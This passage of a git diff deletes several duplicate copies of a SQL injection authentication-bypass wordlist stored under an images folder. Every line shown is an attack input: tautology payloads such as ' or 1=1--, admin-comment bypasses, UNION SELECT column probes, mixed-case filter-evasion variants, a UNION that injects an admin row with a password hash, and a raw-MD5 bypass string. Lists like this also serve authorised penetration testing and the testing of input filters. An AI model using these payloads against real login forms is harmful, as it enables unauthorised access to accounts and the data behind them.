-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
